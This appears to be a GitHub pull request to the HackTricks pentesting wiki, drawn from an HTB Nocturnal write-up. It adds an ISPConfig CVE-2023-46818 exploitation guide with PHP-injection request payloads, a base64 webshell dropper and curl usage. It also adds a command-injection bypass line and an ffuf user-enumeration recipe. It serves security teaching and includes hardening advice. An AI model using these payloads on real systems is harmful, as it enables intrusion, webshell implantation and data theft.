Skip to content

HTB Nocturnal IDOR → Command Injection → Root via ISPConfig ... #1360

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
carlospolop merged 3 commits into from
Aug 28, 2025
Merged

HTB Nocturnal IDOR → Command Injection → Root via ISPConfig ... #1360

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
3b71753
Update searchindex (purged history; keep current)
Aug 27, 2025
1873112
Add content from: HTB Nocturnal: IDOR → Command Injection → Root via …
Aug 27, 2025
90d5ac7
Update command-injection.md
carlospolop Aug 28, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions src/SUMMARY.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -430,6 +430,7 @@
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
- [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
- [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
- [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
- [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
- [Joomla](network-services-pentesting/pentesting-web/joomla.md)
Expand Down
1 change: 1 addition & 0 deletions src/network-services-pentesting/pentesting-web/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
- [**Golang**](golang.md)
- [**GraphQL**](graphql.md)
- [**H2 - Java SQL database**](h2-java-sql-database.md)
- [**ISPConfig**](ispconfig.md)
- [**IIS tricks**](iis-internet-information-services.md)
- [**Microsoft SharePoint**](microsoft-sharepoint.md)
- [**JBOSS**](jboss.md)
Expand Down
107 changes: 107 additions & 0 deletions src/network-services-pentesting/pentesting-web/ispconfig.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,107 @@
# ISPConfig

{{#include ../../banners/hacktricks-training.md}}

## Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.

Key default paths:
- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).

Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:

```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```

## Language editor PHP code injection (CVE-2023-46818)

- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
- Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
- Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

### Manual exploitation flow

1) Open/create a language file to obtain CSRF tokens

Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.

2) Inject PHP via records[] and save

Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:

```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```

Out-of-band test (observe ICMP):

```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```

3) Write files and drop a webshell

Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):

```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```

Then write a simple webshell using base64 to avoid bad characters in the POST body:

```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```

Use it:

```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```

If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.

### Python PoC

A ready-to-use exploit automates token handling and payload delivery:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)

Example run:

```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```

### Hardening

- Upgrade to 3.2.11p1 or later
- Disable the language editor unless strictly needed:

```
admin_allow_langedit=no
```

- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in `admin` account

## References

- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

{{#include ../../banners/hacktricks-training.md}}
3 changes: 3 additions & 0 deletions src/pentesting-web/command-injection.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
Expand Down Expand Up @@ -170,5 +171,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

{{#include ../banners/hacktricks-training.md}}
22 changes: 22 additions & 0 deletions src/pentesting-web/idor.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do
done
```

---

### Error-response oracle for user/file enumeration

When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle:

- Non-existent username → "User not found"
- Bad filename but valid extension → "File does not exist" (sometimes also lists available files)
- Bad extension → validation error

With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users:

```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
```

Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage.

---
## 2. Real-World Case Study – McHire Chatbot Platform (2025)

Expand Down Expand Up @@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}